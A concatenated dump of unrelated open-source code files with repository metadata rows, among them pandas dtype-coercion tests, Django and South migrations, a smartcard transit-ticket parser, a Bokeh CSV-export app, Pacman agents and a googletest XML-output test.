pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04", tz="US/Eastern"),
],
dtype=exp_dtype,
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.xfail(reason="Test not implemented")
def test_where_index_complex128(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_where_index_bool(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_where_series_timedelta64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_where_series_period(self):
raise NotImplementedError
@pytest.mark.parametrize(
"value", [pd.Timedelta(days=9), timedelta(days=9), np.timedelta64(9, "D")]
)
def test_where_index_timedelta64(self, value):
tdi = pd.timedelta_range("1 Day", periods=4)
cond = np.array([True, False, False, True])
expected = pd.TimedeltaIndex(["1 Day", value, value, "4 Days"])
result = tdi.where(cond, value)
tm.assert_index_equal(result, expected)
msg = "value should be a 'Timedelta', 'NaT', or array of thos"
with pytest.raises(TypeError, match=msg):
# wrong-dtyped NaT
tdi.where(cond, np.datetime64("NaT", "ns"))
def test_where_index_period(self):
dti = pd.date_range("2016-01-01", periods=3, freq="QS")
pi = dti.to_period("Q")
cond = np.array([False, True, False])
        # Passing a valid scalar
value = pi[-1] + pi.freq * 10
expected = pd.PeriodIndex([value, pi[1], value])
result = pi.where(cond, value)
tm.assert_index_equal(result, expected)
# Case passing ndarray[object] of Periods
other = np.asarray(pi + pi.freq * 10, dtype=object)
result = pi.where(cond, other)
expected = pd.PeriodIndex([other[0], pi[1], other[2]])
tm.assert_index_equal(result, expected)
# Passing a mismatched scalar
msg = "value should be a 'Period', 'NaT', or array of those"
with pytest.raises(TypeError, match=msg):
pi.where(cond, pd.Timedelta(days=4))
msg = r"Input has different freq=D from PeriodArray\(freq=Q-DEC\)"
with pytest.raises(ValueError, match=msg):
pi.where(cond, pd.Period("2020-04-21", "D"))
class TestFillnaSeriesCoercion(CoercionBase):
    # not indexing, but placed here for consistency
method = "fillna"
@pytest.mark.xfail(reason="Test not implemented")
def test_has_comprehensive_tests(self):
raise NotImplementedError
def _assert_fillna_conversion(self, original, value, expected, expected_dtype):
""" test coercion triggered by fillna """
target = original.copy()
res = target.fillna(value)
self._assert(res, expected, expected_dtype)
@pytest.mark.parametrize(
"fill_val, fill_dtype",
[(1, object), (1.1, object), (1 + 1j, object), (True, object)],
)
def test_fillna_object(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass(["a", np.nan, "c", "d"])
assert obj.dtype == object
exp = klass(["a", fill_val, "c", "d"])
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[(1, np.float64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_fillna_float64(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass([1.1, np.nan, 3.3, 4.4])
assert obj.dtype == np.float64
exp = klass([1.1, fill_val, 3.3, 4.4])
# float + complex -> we don't support a complex Index
# complex for Series,
# object for Index
if fill_dtype == np.complex128 and klass == pd.Index:
fill_dtype = object
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, object),
],
)
def test_fillna_series_complex128(self, fill_val, fill_dtype):
obj = pd.Series([1 + 1j, np.nan, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
exp = pd.Series([1 + 1j, fill_val, 3 + 3j, 4 + 4j])
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), object),
(1, object),
("x", object),
],
ids=["datetime64", "datetime64tz", "object", "object"],
)
def test_fillna_datetime(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass(
[
pd.Timestamp("2011-01-01"),
pd.NaT,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
exp = klass(
[
pd.Timestamp("2011-01-01"),
fill_val,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
(pd.Timestamp("2012-01-01"), object),
(pd.Timestamp("2012-01-01", tz="Asia/Tokyo"), object),
(1, object),
("x", object),
],
)
def test_fillna_datetime64tz(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
tz = "US/Eastern"
obj = klass(
[
pd.Timestamp("2011-01-01", tz=tz),
pd.NaT,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
assert obj.dtype == "datetime64[ns, US/Eastern]"
exp = klass(
[
pd.Timestamp("2011-01-01", tz=tz),
fill_val,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_series_int64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_index_int64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_series_bool(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_index_bool(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_series_timedelta64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_series_period(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_index_timedelta64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_index_period(self):
raise NotImplementedError
class TestReplaceSeriesCoercion(CoercionBase):
klasses = ["series"]
method = "replace"
rep: Dict[str, List] = {}
rep["object"] = ["a", "b"]
rep["int64"] = [4, 5]
rep["float64"] = [1.1, 2.2]
rep["complex128"] = [1 + 1j, 2 + 2j]
rep["bool"] = [True, False]
rep["datetime64[ns]"] = [pd.Timestamp("2011-01-01"), pd.Timestamp("2011-01-03")]
for tz in ["UTC", "US/Eastern"]:
# to test tz => different tz replacement
key = f"datetime64[ns, {tz}]"
rep[key] = [
pd.Timestamp("2011-01-01", tz=tz),
pd.Timestamp("2011-01-03", tz=tz),
]
rep["timedelta64[ns]"] = [pd.Timedelta("1 day"), pd.Timedelta("2 day")]
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64[ns]",
"datetime64[ns, UTC]",
"datetime64[ns, US/Eastern]",
"timedelta64[ns]",
],
ids=[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64",
"datetime64tz",
"datetime64tz",
"timedelta64",
],
)
@pytest.mark.parametrize(
"from_key",
[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64[ns]",
"datetime64[ns, UTC]",
"datetime64[ns, US/Eastern]",
"timedelta64[ns]",
],
)
def test_replace_series(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xxx")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if from_key.startswith("datetime") and to_key.startswith("datetime"):
# tested below
return
elif from_key in ["datetime64[ns, US/Eastern]", "datetime64[ns, UTC]"]:
# tested below
return
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
if (from_key == "float64" and to_key in ("int64")) or (
from_key == "complex128" and to_key in ("int64", "float64")
):
if not IS64 or is_platform_windows():
pytest.skip(f"32-bit platform buggy: {from_key} -> {to_key}")
# Expected: do not downcast by replacement
exp = pd.Series(self.rep[to_key], index=index, name="yyy", dtype=from_key)
else:
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
["timedelta64[ns]", "bool", "object", "complex128", "float64", "int64"],
)
@pytest.mark.parametrize(
"from_key", ["datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"]
)
def test_replace_series_datetime_tz(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xyz")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
["datetime64[ns]", "datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"],
)
@pytest.mark.parametrize(
"from_key",
["datetime64[ns]", "datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"],
)
def test_replace_series_datetime_datetime(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xyz")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.xfail(reason="Test not implemented")
def test_replace_series_period(self):
raise NotImplementedError
| bsd-3-clause | -3,278,554,693,821,692,400 | 33.700087 | 88 | 0.547072 | false |
AlertaDengue/AlertaDengue | AlertaDengue/forecast/migrations/0001_initial.py | 1 | 1221 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-27 00:23
from __future__ import unicode_literals
from django.db import migrations
import sys
def create_dengue_global():
if 'test' in sys.argv:
sql = '''
CREATE SCHEMA IF NOT EXISTS "Dengue_global";
CREATE TABLE IF NOT EXISTS "Dengue_global"."Municipio"
(
geocodigo integer NOT NULL,
nome character varying(128) NOT NULL,
geojson text NOT NULL,
populacao bigint NOT NULL,
uf character varying(20) NOT NULL,
CONSTRAINT "Municipio_pk" PRIMARY KEY (geocodigo)
);
CREATE TABLE IF NOT EXISTS "Dengue_global"."CID10"
(
nome character varying(512) NOT NULL,
codigo character varying(5) NOT NULL,
CONSTRAINT "CID10_pk" PRIMARY KEY (codigo)
);
'''
else:
sql = 'SELECT 1;'
return migrations.RunSQL(sql, hints={'target_db': 'forecast'})
class Migration(migrations.Migration):
operations = [
migrations.SeparateDatabaseAndState(
database_operations=[create_dengue_global()]
)
]
| gpl-3.0 | -4,531,334,576,695,109,000 | 27.395349 | 66 | 0.569206 | false |
12019/cyberflex-shell | cards/vrs_application.py | 2 | 4438 | from generic_application import Application
import struct, binascii, os, datetime, sys, time
from iso_7816_4_card import ISO_7816_4_Card
import utils, TLV_utils, generic_card
class VRS_Application(Application):
DRIVER_NAME = ["VRS"]
AID_LIST = [
"d2760000254b414e4d303100",
"d2760001354b414e4d303100",
]
class VrsTicket(object):
def __init__(self):
self._birthdate = None
self._maindata = []
self._mainblob = None
self._rawdata = None
self._tlvdata = None
self._card = None
def from_card(cls, card, record_no = 1):
if not isinstance(card, VRS_Application):
if not isinstance(card, ISO_7816_4_Card):
raise ValueError, "card must be a VRS_Application object or a ISO_7816_4_Card object, not %s" % type(card)
else:
result = card.select_application(binascii.a2b_hex(VRS_Application.AID_LIST[0]))
if not card.check_sw(result.sw):
raise EnvironmentError, "card did not accept SELECT APPLICATION, sw was %02x %02x" % (result.sw1, result.sw2)
assert isinstance(card, VRS_Application)
c = cls()
c._card = card
result = card.open_file("\x0c\x05")
if card.check_sw(result.sw):
contents = card.read_record(record_no, 4)
if len(contents) > 0:
c._parse( contents )
else:
raise KeyError, "No ticket in record no. %i" % record_no
else:
raise EnvironmentError, "card did not accept SELECT FILE, sw was %02x %02x" % (result.sw1, result.sw2)
return c
def _parse(self, contents):
self._rawdata = contents
self._tlvdata = TLV_utils.unpack(contents)
tmp = TLV_utils.tlv_find_tag(self._tlvdata, 0xEA, num_results = 1)
if len(tmp) == 0:
raise ValueError, "Can't parse information file, tag 0xEA not found"
tmp = TLV_utils.tlv_find_tag(tmp, 0x85, num_results = 1)
if len(tmp) == 0:
raise ValueError, "Can't parse information file, tag 0x85 not found"
self._mainblob = tmp[0][2]
tmp = self._mainblob
some_id, tmp = tmp[:4], tmp[4:]
ascii_field_len = ord(tmp[0])
tmp = tmp[1:]
ascii_field, tmp = tmp[:ascii_field_len], tmp[ascii_field_len:]
self._maindata = ascii_field.split(" ")
if len(tmp) > 0:
if tmp[0] == "\x01":
tmp = tmp[1:]
birthdate_bin, tmp = tmp[:4], tmp[4:]
birthdate = binascii.b2a_hex(birthdate_bin)
self._birthdate = datetime.date( int(birthdate[0:4]), int(birthdate[4:6]), int(birthdate[6:8]) )
if len(tmp) > 0:
print "Warning: unparsed data trailing: %r" % tmp
from_card = classmethod(from_card)
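    # Property factory: each getter reads one field of the space-separated
    # ASCII block split in _parse() (self._maindata), optionally decoding it
    # (e.g. cp850 for the abo/school field below); missing fields yield None.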
def getter(index, encoding=None):
def g(self):
if self._maindata is None or len(self._maindata) <= index:
return None
if encoding is None:
return unicode( self._maindata[index] )
else:
return unicode( self._maindata[index], encoding = encoding )
return g
def _get_alter(self):
now = datetime.date.fromtimestamp( time.time() )
diff = now.year-self.geburtsdatum.year
thisyearsbirthday = datetime.date( now.year, self.geburtsdatum.month, self.geburtsdatum.day )
if now < thisyearsbirthday: diff = diff - 1
return diff
def __str__(self):
return "%s: %s %s" % (self.tickettyp, self.name_klar, self.abonr)
tickettyp = property(getter(0))
rnummer = property(getter(1))
gueltigkeit = property(getter(2))
feld4 = property(getter(3))
name_raw = property(getter(4))
vorname = property(lambda self: self.name_raw and "".join(self.name_raw.split(",_")[1:]).replace("_", " "))
nachname = property(lambda self: self.name_raw and "".join(self.name_raw.split(",_")[:1]).replace("_", " "))
name_klar = property(lambda self: self.vorname + " " + self.nachname)
schule = abonr = property(getter(5,'cp850'))
geburtsdatum = property(lambda self: self._birthdate)
alter = property(lambda self: self._birthdate and self._get_alter())
| gpl-2.0 | 177,444,868,787,737,900 | 36.931624 | 129 | 0.563317 | false |
xpansa/purchase-workflow | purchase_delivery_address/__openerp__.py | 9 | 1328 | # -*- coding: utf-8 -*-
# Author: Leonardo Pistone
# Copyright 2014 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
{'name': 'Purchase Delivery Address [DEPRECATED]',
'summary': 'Deprecated: install purchase_transport_multi_address and '
'stock_transport_multi_address instead',
'version': '8.0.1.1.0',
'author': "Camptocamp,Odoo Community Association (OCA)",
'category': 'Purchase Management',
'license': 'AGPL-3',
'complexity': 'easy',
'images': [],
'depends': ['purchase_transport_multi_address',
'stock_transport_multi_address'
],
'demo': [],
'data': [],
'auto_install': False,
'test': [],
'installable': True,
}
| agpl-3.0 | -6,373,660,281,539,396,000 | 38.058824 | 77 | 0.680723 | false |
GunnerJnr/_CodeInstitute | Stream-3/Full-Stack-Development/10.Custom-User-And-Email-Authentication/3.Changing-Authentication/auth_demo/accounts/models.py | 3 | 1377 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.auth.models import AbstractUser, UserManager
from django.db import models
from django.utils import timezone
# Create your models here.
# Create our new user class
class AccountUserManager(UserManager):
def _create_user(self, username, email, password, is_staff, is_supervisor, **extra_fields):
"""
Creates and saves a User with the given username, email and password.
:param username:
:param email:
:param password:
:param is_staff:
:param is_supervisor:
:param extra_fields:
:return:
"""
now = timezone.now()
if not email:
            raise ValueError('The given email must be set')
email = self.normalize_email(email)
user = self.model(username=email, email=email,
is_staff=is_staff, is_active=True,
is_supervisor=is_supervisor,
date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self.db)
return user
class User(AbstractUser):
# now that we've abstracted this class we can add any
# number of custom attribute to our user class
# in later units we'll be adding things like payment details!
objects = AccountUserManager()
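    # e.g. a hypothetical payment-details field (illustrative only, not part of
    # the original model):
    # stripe_customer_id = models.CharField(max_length=64, blank=True, default='')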
| mit | 3,389,450,783,465,902,000 | 31.785714 | 95 | 0.625999 | false |
schoolie/bokeh | examples/app/export_csv/main.py | 4 | 1399 | from os.path import dirname, join
import pandas as pd
from bokeh.layouts import row, widgetbox
from bokeh.models import ColumnDataSource, CustomJS
from bokeh.models.widgets import Slider, Button, DataTable, TableColumn, NumberFormatter
from bokeh.io import curdoc
df = pd.read_csv(join(dirname(__file__), 'salary_data.csv'))
source = ColumnDataSource(data=dict())
def update():
current = df[df['salary'] <= slider.value].dropna()
source.data = {
'name' : current.name,
'salary' : current.salary,
'years_experience' : current.years_experience,
}
slider = Slider(title="Max Salary", start=10000, end=250000, value=150000, step=1000)
slider.on_change('value', lambda attr, old, new: update())
button = Button(label="Download", button_type="success")
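# The download button is handled entirely client-side: in the stock Bokeh
# export_csv example, download.js (not shown here) serializes source.data to
# CSV and triggers a browser download, so no server round-trip is needed.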
button.callback = CustomJS(args=dict(source=source),
code=open(join(dirname(__file__), "download.js")).read())
columns = [
TableColumn(field="name", title="Employee Name"),
TableColumn(field="salary", title="Income", formatter=NumberFormatter(format="$0,0.00")),
TableColumn(field="years_experience", title="Experience (years)")
]
data_table = DataTable(source=source, columns=columns, width=800)
controls = widgetbox(slider, button)
table = widgetbox(data_table)
curdoc().add_root(row(controls, table))
curdoc().title = "Export CSV"
update()
| bsd-3-clause | -1,741,369,890,174,470,000 | 31.534884 | 93 | 0.686204 | false |
jgome043/cs170-group-project | src/pacmanAgents.py | 1 | 2118 | # pacmanAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# ([email protected]) and Dan Klein ([email protected]).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel ([email protected]).
import random
import game
import util
from game import Agent
from pacman import Directions
class LeftTurnAgent(game.Agent):
"An agent that turns left at every opportunity"
def getAction(self, state):
legal = state.getLegalPacmanActions()
current = state.getPacmanState().configuration.direction
if current == Directions.STOP: current = Directions.NORTH
left = Directions.LEFT[current]
if left in legal: return left
if current in legal: return current
if Directions.RIGHT[current] in legal: return Directions.RIGHT[current]
if Directions.LEFT[left] in legal: return Directions.LEFT[left]
return Directions.STOP
class GreedyAgent(Agent):
def __init__(self, evalFn="scoreEvaluation"):
self.evaluationFunction = util.lookup(evalFn, globals())
assert self.evaluationFunction != None
def getAction(self, state):
# Generate candidate actions
legal = state.getLegalPacmanActions()
if Directions.STOP in legal: legal.remove(Directions.STOP)
successors = [(state.generateSuccessor(0, action), action) for action in legal]
scored = [(self.evaluationFunction(state), action) for state, action in successors]
bestScore = max(scored)[0]
bestActions = [pair[1] for pair in scored if pair[0] == bestScore]
return random.choice(bestActions)
def scoreEvaluation(state):
return state.getScore()
| gpl-3.0 | 3,113,021,930,913,981,000 | 38.222222 | 91 | 0.711048 | false |
ZmG/openwhisk-tutorial | whisk_tutorial/migrations/0005_auto__chg_field_tutorialuser_http_user_agent__chg_field_tutorialuser_h.py | 2 | 6251 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'TutorialUser.http_user_agent'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_user_agent', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_real_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_real_remote_address', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_remote_address', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_accept_language'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_accept_language', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_referrer'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_referrer', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.session_key'
db.alter_column(u'whisk_tutorial_tutorialuser', 'session_key', self.gf('django.db.models.fields.CharField')(unique=True, max_length=40))
# Adding unique constraint on 'TutorialUser', fields ['session_key']
db.create_unique(u'whisk_tutorial_tutorialuser', ['session_key'])
def backwards(self, orm):
# Removing unique constraint on 'TutorialUser', fields ['session_key']
db.delete_unique(u'whisk_tutorial_tutorialuser', ['session_key'])
# Changing field 'TutorialUser.http_user_agent'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_user_agent', self.gf('django.db.models.fields.CharField')(max_length=256))
# Changing field 'TutorialUser.http_real_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_real_remote_address', self.gf('django.db.models.fields.CharField')(max_length=32))
# Changing field 'TutorialUser.http_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_remote_address', self.gf('django.db.models.fields.CharField')(max_length=32))
# Changing field 'TutorialUser.http_accept_language'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_accept_language', self.gf('django.db.models.fields.CharField')(max_length=128))
# Changing field 'TutorialUser.http_referrer'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_referrer', self.gf('django.db.models.fields.CharField')(max_length=128))
# Changing field 'TutorialUser.session_key'
db.alter_column(u'whisk_tutorial_tutorialuser', 'session_key', self.gf('django.db.models.fields.CharField')(max_length=80))
models = {
u'whisk_tutorial.whiskfileevent': {
'Meta': {'object_name': 'DockerfileEvent'},
'errors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'level': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.subscriber': {
'Meta': {'unique_together': "(('email', 'from_level'),)", 'object_name': 'Subscriber'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '80'}),
'from_level': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.tutorialevent': {
'Meta': {'object_name': 'TutorialEvent'},
'command': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80', 'blank': 'True'}),
'feedback': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2000', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.tutorialuser': {
'Meta': {'object_name': 'TutorialUser'},
'http_accept_language': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_real_remote_address': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_referrer': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_remote_address': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_user_agent': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80', 'blank': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['whisk_tutorial'] | apache-2.0 | -8,953,336,706,515,800,000 | 62.795918 | 145 | 0.616541 | false |
FabianHahn/libstore | thirdparty/googletest/googletest/test/gtest_xml_outfiles_test.py | 11 | 5593 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for the gtest_xml_output module."""
import os
from xml.dom import minidom, Node
import gtest_test_utils
import gtest_xml_test_utils
GTEST_OUTPUT_SUBDIR = "xml_outfiles"
GTEST_OUTPUT_1_TEST = "gtest_xml_outfile1_test_"
GTEST_OUTPUT_2_TEST = "gtest_xml_outfile2_test_"
EXPECTED_XML_1 = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*" timestamp="*" name="AllTests">
<testsuite name="PropertyOne" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="TestSomeProperties" status="run" time="*" classname="PropertyOne">
<properties>
<property name="SetUpProp" value="1"/>
<property name="TestSomeProperty" value="1"/>
<property name="TearDownProp" value="1"/>
</properties>
</testcase>
</testsuite>
</testsuites>
"""
EXPECTED_XML_2 = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*" timestamp="*" name="AllTests">
<testsuite name="PropertyTwo" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="TestSomeProperties" status="run" time="*" classname="PropertyTwo">
<properties>
<property name="SetUpProp" value="2"/>
<property name="TestSomeProperty" value="2"/>
<property name="TearDownProp" value="2"/>
</properties>
</testcase>
</testsuite>
</testsuites>
"""
class GTestXMLOutFilesTest(gtest_xml_test_utils.GTestXMLTestCase):
"""Unit test for Google Test's XML output functionality."""
def setUp(self):
# We want the trailing '/' that the last "" provides in os.path.join, for
# telling Google Test to create an output directory instead of a single file
# for xml output.
self.output_dir_ = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_OUTPUT_SUBDIR, "")
self.DeleteFilesAndDir()
def tearDown(self):
self.DeleteFilesAndDir()
def DeleteFilesAndDir(self):
try:
os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_1_TEST + ".xml"))
except os.error:
pass
try:
os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_2_TEST + ".xml"))
except os.error:
pass
try:
os.rmdir(self.output_dir_)
except os.error:
pass
def testOutfile1(self):
self._TestOutFile(GTEST_OUTPUT_1_TEST, EXPECTED_XML_1)
def testOutfile2(self):
self._TestOutFile(GTEST_OUTPUT_2_TEST, EXPECTED_XML_2)
def _TestOutFile(self, test_name, expected_xml):
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(test_name)
command = [gtest_prog_path, "--gtest_output=xml:%s" % self.output_dir_]
p = gtest_test_utils.Subprocess(command,
working_dir=gtest_test_utils.GetTempDir())
self.assert_(p.exited)
self.assertEquals(0, p.exit_code)
# TODO([email protected]): libtool causes the built test binary to be
# named lt-gtest_xml_outfiles_test_ instead of
# gtest_xml_outfiles_test_. To account for this possibility, we
# allow both names in the following code. We should remove this
